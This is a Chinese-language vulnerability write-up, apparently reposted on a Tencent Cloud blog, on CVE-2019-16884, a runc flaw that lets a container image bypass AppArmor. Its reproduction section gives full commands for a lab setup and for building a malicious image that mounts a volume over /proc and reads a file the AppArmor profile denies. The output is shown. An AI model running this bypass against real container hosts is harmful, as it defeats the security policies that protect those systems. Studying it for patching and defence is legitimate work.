CVE-2019-16884:Apparmor Restriction Bypass
CVE-2019-16884:Apparmor Restriction Bypass
Al1ex
发布于 2023-05-12 11:38:09
发布于 2023-05-12 11:38:09
影响范围
runc 1.0.0-rc8
漏洞类型
容器逃逸漏洞
利用条件
影响范围应用
漏洞概述
在Docker 19.03. 2-ce和其他产品中使用的runc 1.0.0-rc8允许绕过AppArmor限制,因为libcontainer/rootfs_linux.go错误地检查装载目标,攻击者可以在容器镜像中可以声明一个VOLUME并挂载至/proc,之后欺骗runc使其认为AppArmor已经成功应用从而绕过AppArmor策略,该漏洞由Adam Iwaniuk发现并在DragonSector CTF 2019期间披露,这个CTF题目挑战将一个文件挂载到/flag-<random>,并使用AppArmor策略拒绝访问该文件,选手可以利用这个漏洞来禁用这个策略并读取文件
漏洞环境
构建实验环境:
docker run -it ssst0n3/docker_archive:CVE-2019-16884
ubuntu login: root
Password: root
漏洞复现
Step 1:创建apparmor规则
cat > /etc/apparmor.d/no_flag <<EOF
#include <tunables/global>
profile no_flag flags=(attach_disconnected,mediate_deleted) {
#include <abstractions/base>
file,
deny /flag r,
}
EOF
Step 2:创建一个flag文件
echo "Al1ex is comming" > /tmp/flag
Step 3:应用规则
/sbin/apparmor_parser --replace --write-cache /etc/apparmor.d/no_flag
Step 4:启动一个正常镜像此时无权限读取/flag内容
docker run --rm --security-opt "apparmor=no_flag" -v /tmp/flag:/flag busybox cat /flag
cat: can't open '/flag': Permission denied
Step 4:利用漏洞启用一个恶意镜像,可以读取/flag
mkdir -p rootfs/proc/self/{attr,fd}
touch rootfs/proc/self/{status,attr/exec}
touch rootfs/proc/self/fd/{4,5}
cat <<EOF > Dockerfile
FROM busybox
ADD rootfs /
VOLUME /proc
EOF
docker build -t apparmor-bypass .
docker run --rm --security-opt "apparmor=no_flag" -v /tmp/flag:/flag apparmor-bypass cat /flag
Al1ex is comming!!!
docker: Error response from daemon: cannot start a stopped process: unknown.
安全建议
升级到最新版本
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2023-04-15,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
相关产品与服务
容器服务
腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。